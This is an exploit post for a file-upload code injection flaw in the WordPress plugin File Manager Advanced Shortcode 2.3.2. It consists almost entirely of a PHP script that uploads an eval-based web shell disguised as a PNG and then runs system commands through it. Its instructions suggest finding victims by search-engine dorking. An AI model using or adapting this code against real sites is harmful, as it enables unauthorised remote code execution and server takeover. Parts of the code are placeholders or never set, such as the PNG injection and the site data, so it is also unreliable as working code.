=============================================================================================================================================
| # Title     : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/                                          |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 106 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 
[+] PayLoad :
<?php
class MetasploitModule {
    private $targetUri;
    private $webshellName;
    private $wpData;
    private $uploadPath;
    private $postParam;
    private $getParam;
    public function __construct($targetUri, $webshell = null, $command = 'passthru') {
        $this->targetUri = $targetUri;
        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();
        $this->postParam = $this->generateRandomString();
        $this->getParam = $this->generateRandomString();
    }
    private function generateRandomWebshellName() {
        return bin2hex(random_bytes(rand(8, 16))) . '.php';
    }
    private function generateRandomString($length = 8) {
        return bin2hex(random_bytes($length));
    }
    private function getFormData($pngWebshell) {
        // Construct multipart form data
        $boundary = md5(time());
        $formData = "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";
        $formData .= "--$boundary\r\n";
        $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";
        $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";
        $formData .= "--$boundary--\r\n";
        return ['data' => $formData, 'boundary' => $boundary];
    }
    private function uploadWebshell($pngWebshell) {
        $formData = $this->getFormData($pngWebshell);
        $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [
            "Content-Type: multipart/form-data; boundary={$formData['boundary']}"
        ]);
        // Handle response and check for upload success
        $responseData = json_decode($response, true);
        if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {
            return true;
        }
                return false;
    }
    private function injectPhpPayloadPng($payload) {
        // Here you should inject PHP code into a PNG file
        // This is just a placeholder for the actual implementation
        return $payload; // Placeholder for the injected PNG
    }
    private function executeCommand($cmd) {
        $payload = base64_encode($cmd);
        $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [
            $this->getParam => 'passthru', // replace with the command function
            $this->postParam => $payload
        ]);
    }
    private function sendRequest($method, $uri, $data, $headers = []) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        if ($method == 'POST') {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    public function exploit() {
        // Check for vulnerabilities and upload webshell logic
        $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
        $pngWebshell = $this->injectPhpPayloadPng($payload);
        if ($this->uploadWebshell($pngWebshell)) {
            $this->executeCommand('whoami'); // Replace 'whoami' with your desired command
        } else {
            echo "Failed to upload webshell.";
        }
    }
}
// Usage example
$exploit = new MetasploitModule('http://target-uri.com');
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================